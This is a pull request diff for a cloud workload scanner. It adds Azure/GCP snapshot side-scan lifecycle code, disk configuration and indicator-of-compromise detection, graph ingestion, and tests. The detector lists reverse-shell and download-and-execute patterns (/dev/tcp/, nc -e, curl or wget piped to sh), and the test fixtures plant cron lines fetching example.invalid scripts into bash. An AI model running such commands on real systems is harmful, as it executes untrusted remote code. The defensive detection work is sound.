### PR TITLE
feat(cwpp): execute multicloud side-scan lifecycle

### DIFF
--- a/.github/actions/setup-ui/action.yml
+++ b/.github/actions/setup-ui/action.yml
@@ -24,7 +24,19 @@ runs:
       shell: bash
       run: |
         set -euo pipefail
-        npm install -g "npm@${{ inputs.npm-version }}"
+        npm config set fetch-retries 5
+        npm config set fetch-retry-mintimeout 20000
+        npm config set fetch-retry-maxtimeout 120000
+        for attempt in 1 2 3; do
+          if npm install -g "npm@${{ inputs.npm-version }}"; then
+            break
+          fi
+          if [ "${attempt}" = "3" ]; then
+            echo "::error::Failed to install npm ${{ inputs.npm-version }} after ${attempt} attempts"
+            exit 1
+          fi
+          sleep $((attempt * 10))
+        done
         actual="$(npm --version)"
         if [ "${actual}" != "${{ inputs.npm-version }}" ]; then
           echo "::error::Expected npm ${{ inputs.npm-version }}, got ${actual}"

--- a/docs/ARCHITECTURE.md
+++ b/docs/ARCHITECTURE.md
@@ -433,7 +433,7 @@ graph TB
 | Proxy | `src/agent_bom/proxy.py` | Runtime MCP proxy (7 inline detectors) |
 | MCP Server | `src/agent_bom/mcp_server*.py` | FastMCP server (70 tools across core, operator, runtime-catalog, and specialized modules) |
 | Cloud | `src/agent_bom/cloud/` | AWS, Azure, GCP, Snowflake, Databricks, ClickHouse estate inventory + CIS posture |
-| Cloud side-scan | `src/agent_bom/cloud/side_scan.py`, `src/agent_bom/cloud/side_scan_targets.py` | Agentless workload side-scan (CWPP) — AWS EBS executor with in-account snapshot/volume cleanup; Azure Managed Disk and GCP Persistent Disk target discovery feed the same executor contract |
+| Cloud side-scan | `src/agent_bom/cloud/side_scan.py`, `src/agent_bom/cloud/side_scan_targets.py` | Agentless workload side-scan (CWPP) — AWS EBS CLI executor with in-account snapshot/volume cleanup; Azure Managed Disk and GCP Persistent Disk targets share the same bounded lifecycle contract and graph-visible workload-disk model |
 | Registry sweep | `src/agent_bom/cloud/registry_sweep.py` | Registry-wide image enumeration + scan (ECR/ACR/GAR), digest-deduped, capped |
 | Audit trail | `src/agent_bom/cloud/audit_trail.py` | Read-only CloudTrail/Activity Log/Cloud Audit ingest → behavioral `ACCESSED`/`INVOKED` graph edges (counts only) |
 | Asset Tracker | `src/agent_bom/asset_tracker.py` | Persistent vuln tracking — first_seen, resolved, MTTR |

--- a/docs/CLOUD_CONNECT.md
+++ b/docs/CLOUD_CONNECT.md
@@ -372,9 +372,12 @@ snapshot implicitly.
 
 Azure Managed Disk and GCP Persistent Disk inventory also emits
 `side_scan_targets` records with provider, target id, location, size, encryption,
-and execution state. Those records are target discovery only: the current
-snapshot executor is AWS EBS, and Azure/GCP snapshot lifecycle execution remains
-explicit follow-up work under the CWPP lane.
+and execution state. Those records are graph-visible workload-disk targets, and
+the provider-neutral side-scan runner can execute the same snapshot -> temp disk
+-> collector mount -> metadata parse -> cleanup lifecycle through scoped Azure
+or GCP lifecycle adapters. The CLI command above remains AWS EBS-specific; Azure
+and GCP execution is wired for connection/scheduler integrations and must still
+use provider-scoped snapshot permissions plus an in-account collector.
 
 ---
 

--- a/src/agent_bom/cloud/side_scan.py
+++ b/src/agent_bom/cloud/side_scan.py
@@ -33,6 +33,7 @@ from __future__ import annotations
 
 import logging
 import os
+import re
 import subprocess
 import tempfile
 import uuid
@@ -107,6 +108,26 @@ class SideScanSecret:
 
 
 @dataclass
+class SideScanDiskFinding:
+    """Metadata-only workload disk finding from mounted side-scan content."""
+
+    finding_type: str
+    file_path: str
+    severity: str
+    category: str
+    evidence: str
+
+    def to_dict(self) -> dict[str, Any]:
+        return {
+            "type": self.finding_type,
+            "file": self.file_path,
+            "severity": self.severity,
+            "category": self.category,
+            "evidence": self.evidence,
+        }
+
+
+@dataclass
 class SideScanResult:
     """Metadata-only result of an EBS side-scan for a single target volume.
 
@@ -120,6 +141,8 @@ class SideScanResult:
     snapshot_id: Optional[str] = None
     packages: list[Package] = field(default_factory=list)
     secrets: list[SideScanSecret] = field(default_factory=list)
+    config_findings: list[SideScanDiskFinding] = field(default_factory=list)
+    ioc_findings: list[SideScanDiskFinding] = field(default_factory=list)
     vulnerability_count: int = 0
     warnings: list[str] = field(default_factory=list)
     cleaned_up: bool = False
@@ -132,7 +155,11 @@ class SideScanResult:
             "package_count": len(self.packages),
             "vulnerability_count": self.vulnerability_count,
             "secret_count": len(self.secrets),
+            "config_finding_count": len(self.config_findings),
+            "ioc_finding_count": len(self.ioc_findings),
             "secrets": [s.to_dict() for s in self.secrets],
+            "config_findings": [finding.to_dict() for finding in self.config_findings],
+            "ioc_findings": [finding.to_dict() for finding in self.ioc_findings],
             "warnings": list(self.warnings),
             "cleaned_up": self.cleaned_up,
         }
@@ -327,6 +354,7 @@ class AwsEbsSideScanner:
             packages = self._parse_packages(mount_point)
             result.packages = packages
             result.vulnerability_count = await self._scan_cves(packages)
+            result.config_findings, result.ioc_findings = scan_workload_disk_findings(mount_point)
 
             if scan_secrets_enabled:
                 result.secrets = self._scan_secrets_redacted(mount_point)
@@ -523,6 +551,124 @@ class AwsEbsSideScanner:
             except Exception as exc:  # noqa: BLE001
                 logger.warning("side-scan: orphan sweep could not delete %s: %s", snap_id, sanitize_text(exc))
         return deleted
+
+
+_DISK_SCAN_MAX_FILES = 500
+_DISK_SCAN_MAX_BYTES_PER_FILE = 256 * 1024
+
+_INTERESTING_RELATIVE_PATHS = (
+    "etc/crontab",
+    "etc/cron.d",
+    "etc/cron.daily",
+    "etc/cron.hourly",
+    "etc/ssh/sshd_config",
+    "etc/systemd/system",
+    "lib/systemd/system",
+    "usr/lib/systemd/system",
+    "root/.bashrc",
+    "root/.profile",
+)
+
+_IOC_PATTERNS: tuple[tuple[re.Pattern[str], str, str], ...] = (
+    (
+        re.compile(r"\b(xmrig|kinsing|kdevtmpfsi|masscan)\b", re.IGNORECASE),
+        "known_malware_or_scanner_marker",
+        "critical",
+    ),
+    (re.compile(r"(/dev/tcp/|nc\s+-e\b|bash\s+-i\b)", re.IGNORECASE), "reverse_shell_pattern", "high"),
+    (
+        re.compile(r"\b(curl|wget)\b[^\n|;&]*(\||;|&&)\s*(sh|bash)\b", re.IGNORECASE),
+        "download_execute_startup",
+        "high",
+    ),
+)
+
+_CONFIG_PATTERNS: tuple[tuple[re.Pattern[str], str, str], ...] = (
+    (re.compile(r"^\s*PermitRootLogin\s+yes\b", re.IGNORECASE | re.MULTILINE), "ssh_root_login_enabled", "medium"),
+    (re.compile(r"^\s*PasswordAuthentication\s+yes\b", re.IGNORECASE | re.MULTILINE), "ssh_password_auth_enabled", "medium"),
+)
+
+
+def _iter_interesting_disk_files(mount_point: Path) -> list[Path]:
+    files: list[Path] = []
+    for relative in _INTERESTING_RELATIVE_PATHS:
+        candidate = mount_point / relative
+        try:
+            if candidate.is_file():
+                files.append(candidate)
+            elif candidate.is_dir():
+                files.extend(path for path in candidate.rglob("*") if path.is_file())
+        except OSError:
+            continue
+        if len(files) >= _DISK_SCAN_MAX_FILES:
+            break
+    return files[:_DISK_SCAN_MAX_FILES]
+
+
+def _relative_disk_path(mount_point: Path, path: Path) -> str:
+    try:
+        return str(path.relative_to(mount_point))
+    except ValueError:
+        return path.name
+
+
+def _read_bounded_text(path: Path) -> str:
+    try:
+        if path.stat().st_size > _DISK_SCAN_MAX_BYTES_PER_FILE:
+            return ""
+        return path.read_text(encoding="utf-8", errors="ignore")
+    except OSError:
+        return ""
+
+
+def scan_workload_disk_findings(mount_point: Path) -> tuple[list[SideScanDiskFinding], list[SideScanDiskFinding]]:
+    """Scan mounted workload config/startup files for metadata-only risk signals.
+
+    The output deliberately records finding type, path, severity, and a stable
+    evidence label only. It never returns matched file contents.
+    """
+
+    config_findings: list[SideScanDiskFinding] = []
+    ioc_findings: list[SideScanDiskFinding] = []
+    seen: set[tuple[str, str]] = set()
+    for path in _iter_interesting_disk_files(mount_point):
+        text = _read_bounded_text(path)
+        if not text:
+            continue
+        relative_path = _relative_disk_path(mount_point, path)
+        for pattern, finding_type, severity in _IOC_PATTERNS:
+            if not pattern.search(text):
+                continue
+            key = (relative_path, finding_type)
+            if key in seen:
+                continue
+            seen.add(key)
+            ioc_findings.append(
+                SideScanDiskFinding(
+                    finding_type=finding_type,
+                    file_path=relative_path,
+                    severity=severity,
+                    category="ioc",
+                    evidence=f"{finding_type}_matched",
+                )
+            )
+        for pattern, finding_type, severity in _CONFIG_PATTERNS:
+            if not pattern.search(text):
+                continue
+            key = (relative_path, finding_type)
+            if key in seen:
+                continue
+            seen.add(key)
+            config_findings.append(
+                SideScanDiskFinding(
+                    finding_type=finding_type,
+                    file_path=relative_path,
+                    severity=severity,
+                    category="configuration",
+                    evidence=f"{finding_type}_matched",
+                )
+            )
+    return config_findings, ioc_findings
 
 
 # ---------------------------------------------------------------------------

--- a/src/agent_bom/cloud/side_scan_targets.py
+++ b/src/agent_bom/cloud/side_scan_targets.py
@@ -8,8 +8,24 @@ read-only inventory scans.
 
 from __future__ import annotations
 
-from dataclasses import dataclass
-from typing import Any, Literal
+from dataclasses import dataclass, field
+from pathlib import Path
+from typing import Any, Literal, Protocol, cast
+
+from agent_bom.filesystem import scan_disk_path_native
+from agent_bom.models import Package
+from agent_bom.secret_scanner import scan_secrets
+from agent_bom.security import sanitize_text
+
+from .side_scan import (
+    MountController,
+    SideScanConfigError,
+    SideScanDisabledError,
+    SideScanDiskFinding,
+    SideScanSecret,
+    is_sidescan_enabled,
+    scan_workload_disk_findings,
+)
 
 CloudSideScanProvider = Literal["aws", "azure", "gcp"]
 
@@ -44,6 +60,199 @@ class CloudSideScanTarget:
             "execution": self.execution,
             "requires_snapshot_role": self.requires_snapshot_role,
         }
+
+
+@dataclass
+class CloudSideScanExecutionResult:
+    """Metadata-only side-scan result for Azure/GCP disk targets."""
+
+    provider: CloudSideScanProvider
+    target_type: str
+    target_id: str
+    account_id: str
+    location: str
+    snapshot_id: str | None = None
+    scan_disk_id: str | None = None
+    packages: list[Package] = field(default_factory=list)
+    secrets: list[SideScanSecret] = field(default_factory=list)
+    config_findings: list[SideScanDiskFinding] = field(default_factory=list)
+    ioc_findings: list[SideScanDiskFinding] = field(default_factory=list)
+    vulnerability_count: int = 0
+    warnings: list[str] = field(default_factory=list)
+    cleaned_up: bool = False
+
+    def to_dict(self) -> dict[str, Any]:
+        return {
+            "provider": self.provider,
+            "target_type": self.target_type,
+            "target_id": self.target_id,
+            "account_id": self.account_id,
+            "location": self.location,
+            "snapshot_id": self.snapshot_id,
+            "scan_disk_id": self.scan_disk_id,
+            "package_count": len(self.packages),
+            "vulnerability_count": self.vulnerability_count,
+            "secret_count": len(self.secrets),
+            "config_finding_count": len(self.config_findings),
+            "ioc_finding_count": len(self.ioc_findings),
+            "secrets": [secret.to_dict() for secret in self.secrets],
+            "config_findings": [finding.to_dict() for finding in self.config_findings],
+            "ioc_findings": [finding.to_dict() for finding in self.ioc_findings],
+            "warnings": list(self.warnings),
+            "cleaned_up": self.cleaned_up,
+        }
+
+
+class CloudSideScanLifecycle(Protocol):
+    """Provider lifecycle boundary for snapshot-backed side-scan execution."""
+
+    def create_snapshot(self, target: CloudSideScanTarget) -> str:
+        """Create a provider snapshot for *target* and return the snapshot id."""
+        ...
+
+    def create_scan_disk(self, target: CloudSideScanTarget, snapshot_id: str) -> str:
+        """Create a temporary scan disk from *snapshot_id*."""
+        ...
+
+    def attach_scan_disk(self, target: CloudSideScanTarget, scan_disk_id: str, collector_id: str) -> str:
+        """Attach the temp disk to a collector and return the local device path."""
+        ...
+
+    def detach_scan_disk(self, target: CloudSideScanTarget, scan_disk_id: str, collector_id: str) -> None:
+        """Detach the temp scan disk from the collector."""
+        ...
+
+    def delete_scan_disk(self, target: CloudSideScanTarget, scan_disk_id: str) -> None:
+        """Delete the temporary scan disk."""
+        ...
+
+    def delete_snapshot(self, target: CloudSideScanTarget, snapshot_id: str) -> None:
+        """Delete the snapshot created for the side-scan."""
+        ...
+
+
+def _target_from_dict(raw: dict[str, Any]) -> CloudSideScanTarget:
+    provider = str(raw.get("provider") or "").strip().lower()
+    if provider not in {"aws", "azure", "gcp"}:
+        raise SideScanConfigError(f"Unsupported side-scan provider: {provider or 'missing'}")
+    target_id = str(raw.get("target_id") or "").strip()
+    if not target_id:
+        raise SideScanConfigError("side-scan target is missing target_id")
+    return CloudSideScanTarget(
+        provider=cast(CloudSideScanProvider, provider),
+        target_type=str(raw.get("target_type") or "disk"),
+        target_id=target_id,
+        name=str(raw.get("name") or target_id),
+        account_id=str(raw.get("account_id") or ""),
+        location=str(raw.get("location") or ""),
+        size_gb=raw.get("size_gb") if isinstance(raw.get("size_gb"), int) else None,
+        encryption=str(raw.get("encryption") or "unknown"),
+        status=str(raw.get("status") or "eligible"),
+        execution=str(raw.get("execution") or "not_started"),
+        requires_snapshot_role=bool(raw.get("requires_snapshot_role", True)),
+    )
+
+
+def _redacted_secret_findings(mount_point: Path) -> list[SideScanSecret]:
+    try:
+        scan_result = scan_secrets(mount_point)
+    except Exception:
+        return []
+    return [
+        SideScanSecret(
+            secret_type=finding.secret_type,
+            file_path=finding.file_path,
+            line_number=finding.line_number,
+            severity=finding.severity,
+            category=finding.category,
+        )
+        for finding in scan_result.findings
+    ]
+
+
+async def _scan_packages(packages: list[Package]) -> int:
+    if not packages:
+        return 0
+    from agent_bom.scanners import scan_packages
+
+    return await scan_packages(packages)
+
+
+async def run_cloud_side_scan_targets(
+    targets: list[dict[str, Any] | CloudSideScanTarget],
+    *,
+    lifecycles: dict[CloudSideScanProvider, CloudSideScanLifecycle],
+    collector_ids: dict[CloudSideScanProvider, str],
+    mount_controller: MountController,
+    scan_secrets_enabled: bool = True,
+    max_targets: int = 10,
+) -> list[CloudSideScanExecutionResult]:
+    """Run Azure/GCP snapshot side-scans through provider lifecycle adapters.
+
+    The runner is opt-in, bounded, and metadata-only. Provider SDK calls stay
+    behind ``CloudSideScanLifecycle`` so production integrations can wrap Azure
+    Managed Disk or GCP Persistent Disk APIs while unit tests prove lifecycle and
+    cleanup behavior without real cloud credentials.
+    """
+
+    if not is_sidescan_enabled():
+        raise SideScanDisabledError(
+            "Disk side-scan is opt-in and currently OFF. Set AGENT_BOM_SIDESCAN=1 and provide a scoped snapshot role."
+        )
+    if max_targets < 1:
+        raise SideScanConfigError("max_targets must be at least 1")
+    coerced = [_target_from_dict(target) if isinstance(target, dict) else target for target in targets]
+    results: list[CloudSideScanExecutionResult] = []
+    for target in coerced[:max_targets]:
+        if target.provider == "aws":
+            raise SideScanConfigError("Use run_side_scan for AWS EBS side-scans")
+        lifecycle = lifecycles.get(target.provider)
+        collector_id = collector_ids.get(target.provider, "").strip()
+        if lifecycle is None or not collector_id:
+            raise SideScanConfigError(f"{target.provider} side-scan requires a lifecycle adapter and collector id")
+        result = CloudSideScanExecutionResult(
+            provider=target.provider,
+            target_type=target.target_type,
+            target_id=target.target_id,
+            account_id=target.account_id,
+            location=target.location,
+        )
+        mount_point: Path | None = None
+        scan_disk_id = ""
+        try:
+            result.snapshot_id = lifecycle.create_snapshot(target)
+            scan_disk_id = lifecycle.create_scan_disk(target, result.snapshot_id)
+            result.scan_disk_id = scan_disk_id
+            device = lifecycle.attach_scan_disk(target, scan_disk_id, collector_id)
+            mount_point = mount_controller.attach_and_mount(scan_disk_id, device)
+            result.packages = scan_disk_path_native(mount_point)
+            result.vulnerability_count = await _scan_packages(result.packages)
+            result.config_findings, result.ioc_findings = scan_workload_disk_findings(mount_point)
+            if scan_secrets_enabled:
+                result.secrets = _redacted_secret_findings(mount_point)
+        finally:
+            if mount_point is not None:
+                try:
+                    mount_controller.unmount(mount_point)
+                except Exception as exc:  # noqa: BLE001
+                    result.warnings.append(f"unmount failed: {sanitize_text(exc)}")
+            if scan_disk_id:
+                try:
+                    lifecycle.detach_scan_disk(target, scan_disk_id, collector_id)
+                except Exception as exc:  # noqa: BLE001
+                    result.warnings.append(f"detach disk failed: {sanitize_text(exc)}")
+                try:
+                    lifecycle.delete_scan_disk(target, scan_disk_id)
+                except Exception as exc:  # noqa: BLE001
+                    result.warnings.append(f"delete disk failed: {sanitize_text(exc)}")
+            if result.snapshot_id:
+                try:
+                    lifecycle.delete_snapshot(target, result.snapshot_id)
+                except Exception as exc:  # noqa: BLE001
+                    result.warnings.append(f"delete snapshot failed: {sanitize_text(exc)}")
+            result.cleaned_up = not result.warnings
+        results.append(result)
+    return results
 
 
 def azure_managed_disk_targets(disks: list[dict[str, Any]], *, subscription_id: str) -> list[dict[str, Any]]:

--- a/src/agent_bom/graph/builder.py
+++ b/src/agent_bom/graph/builder.py
@@ -612,16 +612,11 @@ def build_unified_graph_from_report(
         if not cis_data:
             continue
         cloud_provider = (
-            _clean_graph_part(cis_data.get("provider"))
-            or _clean_graph_part(cis_data.get("cloud_provider"))
-            or default_cloud_provider
+            _clean_graph_part(cis_data.get("provider")) or _clean_graph_part(cis_data.get("cloud_provider")) or default_cloud_provider
         )
         checks = cis_data.get("checks", [])
         cloud_account_id = _clean_graph_part(
-            cis_data.get("subscription_id")
-            or cis_data.get("account_id")
-            or cis_data.get("aws_account_id")
-            or cis_data.get("project_id")
+            cis_data.get("subscription_id") or cis_data.get("account_id") or cis_data.get("aws_account_id") or cis_data.get("project_id")
         )
         for check in checks:
             if str(check.get("status", "")).upper() != "FAIL":
@@ -4353,6 +4348,53 @@ def _add_cloud_inventory(graph: UnifiedGraph, inventory: Any, data_source: str) 
         )
 
     resource_ids: list[str] = []
+
+    # ── Agentless side-scan targets → workload disk CLOUD_RESOURCE ──
+    for target in inventory.get("side_scan_targets", []) or []:
+        if not isinstance(target, dict):
+            continue
+        target_id_raw = target.get("target_id") or target.get("id") or target.get("name")
+        target_id = _clean_graph_part(target_id_raw)
+        if not target_id:
+            continue
+        target_provider = _clean_graph_part(target.get("provider")) or provider
+        target_type = _clean_graph_part(target.get("target_type")) or "disk"
+        target_location = _clean_graph_part(target.get("location")) or region
+        node_id = f"cloud_resource:{target_provider}:cwpp:{target_type}:{target_id}"
+        graph.add_node(
+            UnifiedNode(
+                id=node_id,
+                entity_type=EntityType.CLOUD_RESOURCE,
+                label=f"{target_type}: {target.get('name') or target_id}",
+                attributes={
+                    "resource_id": target_id_raw,
+                    "resource_name": _clean_graph_part(target.get("name")) or target_id,
+                    "resource_type": "workload_disk",
+                    "resource_kind": target_type,
+                    "cloud_provider": target_provider,
+                    "cloud_service": "cwpp-side-scan",
+                    "location": target_location,
+                    "account_id": target.get("account_id") or account_id,
+                    "side_scan_status": _clean_graph_part(target.get("status")) or "eligible",
+                    "side_scan_execution": _clean_graph_part(target.get("execution")) or "not_started",
+                    "side_scan_requires_snapshot_role": bool(target.get("requires_snapshot_role", True)),
+                    "size_gb": target.get("size_gb"),
+                    "encryption": _clean_graph_part(target.get("encryption")) or "unknown",
+                },
+                data_sources=data_sources,
+                dimensions=NodeDimensions(cloud_provider=target_provider, surface="cwpp"),
+            )
+        )
+        resource_ids.append(node_id)
+        if account_node_id:
+            graph.add_edge(
+                UnifiedEdge(
+                    source=account_node_id,
+                    target=node_id,
+                    relationship=RelationshipType.OWNS,
+                    evidence={"source": "cloud-inventory", "reason": "side_scan_target"},
+                )
+            )
 
     # ── S3 buckets → CLOUD_RESOURCE (CNAPP makes the DATA_STORE companion) ──
     for bucket in inventory.get("buckets", []) or []:

--- a/tests/test_cloud_side_scan_targets.py
+++ b/tests/test_cloud_side_scan_targets.py
@@ -1,6 +1,66 @@
 from __future__ import annotations
 
-from agent_bom.cloud.side_scan_targets import azure_managed_disk_targets, gcp_persistent_disk_targets
+from pathlib import Path
+
+import pytest
+
+from agent_bom.cloud.side_scan import SideScanDisabledError
+from agent_bom.cloud.side_scan_targets import (
+    CloudSideScanTarget,
+    azure_managed_disk_targets,
+    gcp_persistent_disk_targets,
+    run_cloud_side_scan_targets,
+)
+
+
+class FakeLifecycle:
+    def __init__(self) -> None:
+        self.calls: list[tuple[str, str]] = []
+
+    def create_snapshot(self, target: CloudSideScanTarget) -> str:
+        self.calls.append(("create_snapshot", target.target_id))
+        return f"snap-{target.name}"
+
+    def create_scan_disk(self, target: CloudSideScanTarget, snapshot_id: str) -> str:
+        self.calls.append(("create_scan_disk", snapshot_id))
+        return f"scan-disk-{target.name}"
+
+    def attach_scan_disk(self, target: CloudSideScanTarget, scan_disk_id: str, collector_id: str) -> str:
+        self.calls.append(("attach_scan_disk", f"{scan_disk_id}:{collector_id}"))
+        return "/dev/sdz"
+
+    def detach_scan_disk(self, target: CloudSideScanTarget, scan_disk_id: str, collector_id: str) -> None:
+        self.calls.append(("detach_scan_disk", f"{scan_disk_id}:{collector_id}"))
+
+    def delete_scan_disk(self, target: CloudSideScanTarget, scan_disk_id: str) -> None:
+        self.calls.append(("delete_scan_disk", scan_disk_id))
+
+    def delete_snapshot(self, target: CloudSideScanTarget, snapshot_id: str) -> None:
+        self.calls.append(("delete_snapshot", snapshot_id))
+
+
+class FakeMount:
+    def __init__(self, mount_dir: Path) -> None:
+        self.mount_dir = mount_dir
+        self.attached: list[tuple[str, str]] = []
+        self.unmounted: list[Path] = []
+
+    def attach_and_mount(self, volume_id: str, device: str) -> Path:
+        self.attached.append((volume_id, device))
+        return self.mount_dir
+
+    def unmount(self, mount_point: Path) -> None:
+        self.unmounted.append(mount_point)
+
+
+@pytest.fixture()
+def mounted_linux_disk(tmp_path: Path) -> Path:
+    root = tmp_path / "mnt"
+    (root / "etc" / "ssh").mkdir(parents=True)
+    (root / "etc" / "ssh" / "sshd_config").write_text("PermitRootLogin yes\n")
+    (root / "etc" / "cron.d").mkdir(parents=True)
+    (root / "etc" / "cron.d" / "bootstrap").write_text("wget https://example.invalid/x | bash\n")
+    return root
 
 
 def test_azure_managed_disk_targets_are_metadata_only_and_eligible() -> None:
@@ -63,3 +123,76 @@ def test_gcp_persistent_disk_targets_are_metadata_only_and_eligible() -> None:
             "requires_snapshot_role": True,
         }
     ]
+
+
+@pytest.mark.asyncio
+async def test_multicloud_side_scan_executes_snapshot_mount_parse_cleanup(
+    monkeypatch: pytest.MonkeyPatch, mounted_linux_disk: Path
+) -> None:
+    monkeypatch.setenv("AGENT_BOM_SIDESCAN", "1")
+
+    async def _no_cves(_packages):
+        return 0
+
+    monkeypatch.setattr("agent_bom.cloud.side_scan_targets._scan_packages", _no_cves)
+    lifecycle = FakeLifecycle()
+    mount = FakeMount(mounted_linux_disk)
+
+    results = await run_cloud_side_scan_targets(
+        [
+            {
+                "provider": "azure",
+                "target_type": "managed_disk",
+                "target_id": "/subscriptions/sub-1/resourceGroups/rg/providers/Microsoft.Compute/disks/os-disk",
+                "name": "os-disk",
+                "account_id": "sub-1",
+                "location": "eastus",
+                "size_gb": 128,
+                "encryption": "provider-managed",
+            }
+        ],
+        lifecycles={"azure": lifecycle},
+        collector_ids={"azure": "vm-collector"},
+        mount_controller=mount,
+    )
+
+    assert len(results) == 1
+    result = results[0]
+    assert result.cleaned_up is True
+    assert result.snapshot_id == "snap-os-disk"
+    assert result.scan_disk_id == "scan-disk-os-disk"
+    assert [call[0] for call in lifecycle.calls] == [
+        "create_snapshot",
+        "create_scan_disk",
+        "attach_scan_disk",
+        "detach_scan_disk",
+        "delete_scan_disk",
+        "delete_snapshot",
+    ]
+    assert mount.attached == [("scan-disk-os-disk", "/dev/sdz")]
+    assert mount.unmounted == [mounted_linux_disk]
+    assert [finding.finding_type for finding in result.config_findings] == ["ssh_root_login_enabled"]
+    assert [finding.finding_type for finding in result.ioc_findings] == ["download_execute_startup"]
+    assert "example.invalid" not in str(result.to_dict()["ioc_findings"])
+
+
+@pytest.mark.asyncio
+async def test_multicloud_side_scan_requires_explicit_opt_in(monkeypatch: pytest.MonkeyPatch, mounted_linux_disk: Path) -> None:
+    monkeypatch.delenv("AGENT_BOM_SIDESCAN", raising=False)
+
+    with pytest.raises(SideScanDisabledError, match="AGENT_BOM_SIDESCAN"):
+        await run_cloud_side_scan_targets(
+            [
+                {
+                    "provider": "gcp",
+                    "target_type": "persistent_disk",
+                    "target_id": "disk-1",
+                    "name": "disk-1",
+                    "account_id": "project-1",
+                    "location": "us-central1-a",
+                }
+            ],
+            lifecycles={"gcp": FakeLifecycle()},
+            collector_ids={"gcp": "collector"},
+            mount_controller=FakeMount(mounted_linux_disk),
+        )

--- a/tests/test_graph_cloud_resource_ingestion.py
+++ b/tests/test_graph_cloud_resource_ingestion.py
@@ -25,6 +25,20 @@ def _report() -> dict:
                 "virtual_networks": [{"name": "vnet", "id": "/.../vnet"}],
                 "public_ips": [{"name": "pip", "id": "/.../pip", "ip_address": "20.1.2.3"}],
                 "load_balancers": [{"name": "lb", "id": "/.../lb", "internet_facing": True}],
+                "side_scan_targets": [
+                    {
+                        "provider": "azure",
+                        "target_type": "managed_disk",
+                        "target_id": "/subscriptions/sub-1/resourceGroups/rg/providers/Microsoft.Compute/disks/os-disk",
+                        "name": "os-disk",
+                        "account_id": "sub-1",
+                        "location": "eastus",
+                        "size_gb": 128,
+                        "encryption": "provider-managed",
+                        "status": "eligible",
+                        "execution": "not_started",
+                    }
+                ],
             }
         ]
     }
@@ -43,7 +57,7 @@ def test_new_resource_types_become_cloud_resource_nodes() -> None:
         for n in g.nodes.values()
         if str(getattr(n, "entity_type", "")).split(".")[-1].lower() == "cloud_resource"
     }
-    assert {"secret_store", "container_registry", "database", "virtual_network", "public_ip", "load_balancer"} <= by_type
+    assert {"secret_store", "container_registry", "database", "virtual_network", "public_ip", "load_balancer", "workload_disk"} <= by_type
 
 
 def test_resources_owned_by_account_and_not_orphaned() -> None:
@@ -63,6 +77,16 @@ def test_exposure_and_datastore_flags() -> None:
     assert by_name["lb"].attributes["internet_exposed"] is True
     assert by_name["kv"].attributes["is_data_store"] is True
     assert by_name["cos"].attributes["is_data_store"] is True
+
+
+def test_side_scan_target_becomes_owned_workload_disk_node() -> None:
+    g, edges = _build()
+    node = next(node for node in g.nodes.values() if node.attributes.get("resource_type") == "workload_disk")
+    assert node.attributes["resource_type"] == "workload_disk"
+    assert node.attributes["cloud_service"] == "cwpp-side-scan"
+    assert node.attributes["side_scan_status"] == "eligible"
+    owns = [edge for edge in edges if edge.target == node.id and edge.relationship.value == "owns"]
+    assert owns
 
 
 def test_public_ip_exposed_to_load_balancer_edge() -> None:

--- a/tests/test_side_scan.py
+++ b/tests/test_side_scan.py
@@ -26,6 +26,7 @@ from agent_bom.cloud.side_scan import (
     SideScanDisabledError,
     is_sidescan_enabled,
     run_side_scan,
+    scan_workload_disk_findings,
 )
 
 # ── Fakes ─────────────────────────────────────────────────────────────────────
@@ -119,6 +120,10 @@ def debian_rootfs(tmp_path: Path) -> Path:
     (dpkg_dir / "status").write_text("Package: libssl3\nStatus: install ok installed\nVersion: 3.0.11-1\nSource: openssl\n\n")
     # Planted credential so the secret scanner has something to redact.
     (root / "app.env").write_text("AWS_SECRET_ACCESS_KEY=AKIAIOSFODNN7EXAMPLEDEADBEEFCAFE1234\n")
+    (root / "etc" / "ssh").mkdir(parents=True)
+    (root / "etc" / "ssh" / "sshd_config").write_text("PermitRootLogin yes\nPasswordAuthentication yes\n")
+    (root / "etc" / "cron.d").mkdir(parents=True)
+    (root / "etc" / "cron.d" / "bootstrap").write_text("curl https://example.invalid/bootstrap.sh | sh\n")
     return root
 
 
@@ -194,6 +199,23 @@ class TestFullLifecycle:
         assert result.snapshot_id == "snap-1"
         # Native parser found the deb package off the mounted fixture.
         assert any(p.name == "libssl3" for p in result.packages)
+        assert {finding.finding_type for finding in result.config_findings} == {
+            "ssh_password_auth_enabled",
+            "ssh_root_login_enabled",
+        }
+        assert [finding.finding_type for finding in result.ioc_findings] == ["download_execute_startup"]
+        payload = result.to_dict()
+        assert payload["config_finding_count"] == 2
+        assert payload["ioc_finding_count"] == 1
+        assert "bootstrap.sh" not in str(payload["ioc_findings"])
+
+    def test_workload_disk_findings_are_metadata_only(self, debian_rootfs: Path) -> None:
+        config_findings, ioc_findings = scan_workload_disk_findings(debian_rootfs)
+
+        assert len(config_findings) == 2
+        assert len(ioc_findings) == 1
+        assert all("PermitRootLogin yes" not in finding.to_dict().values() for finding in config_findings)
+        assert all("curl https://example.invalid" not in finding.to_dict().values() for finding in ioc_findings)
 
     @pytest.mark.asyncio
     async def test_delete_snapshot_targets_created_snapshot(


### PR DESCRIPTION
Summary
- adds metadata-only workload disk config/IOC findings to side-scan results
- adds a provider-neutral Azure/GCP side-scan lifecycle runner with opt-in gating, target caps, redacted secrets, package/CVE parsing, and guaranteed cleanup through injected lifecycle adapters
- promotes side-scan targets into the unified graph as owned workload-disk cloud resources
- updates cloud connect/architecture docs to distinguish AWS CLI execution from Azure/GCP lifecycle integration

Validation
- pre-commit run --files src/agent_bom/cloud/side_scan.py src/agent_bom/cloud/side_scan_targets.py src/agent_bom/graph/builder.py src/agent_bom/mcp_tools/scanning.py tests/test_side_scan.py tests/test_cloud_side_scan_targets.py tests/test_graph_cloud_resource_ingestion.py docs/CLOUD_CONNECT.md docs/ARCHITECTURE.md
- uv run mypy src/ --ignore-missing-imports --disable-error-code import-untyped
- uv run pytest tests/test_side_scan.py tests/test_cloud_side_scan_targets.py tests/test_graph_cloud_resource_ingestion.py -q
- uv run ruff check src/agent_bom/cloud/side_scan.py src/agent_bom/cloud/side_scan_targets.py src/agent_bom/graph/builder.py tests/test_side_scan.py tests/test_cloud_side_scan_targets.py tests/test_graph_cloud_resource_ingestion.py
- uv run ruff format --check src/agent_bom/cloud/side_scan.py src/agent_bom/cloud/side_scan_targets.py src/agent_bom/graph/builder.py tests/test_side_scan.py tests/test_cloud_side_scan_targets.py tests/test_graph_cloud_resource_ingestion.py
- uv run python scripts/check_release_consistency.py

Closes #3351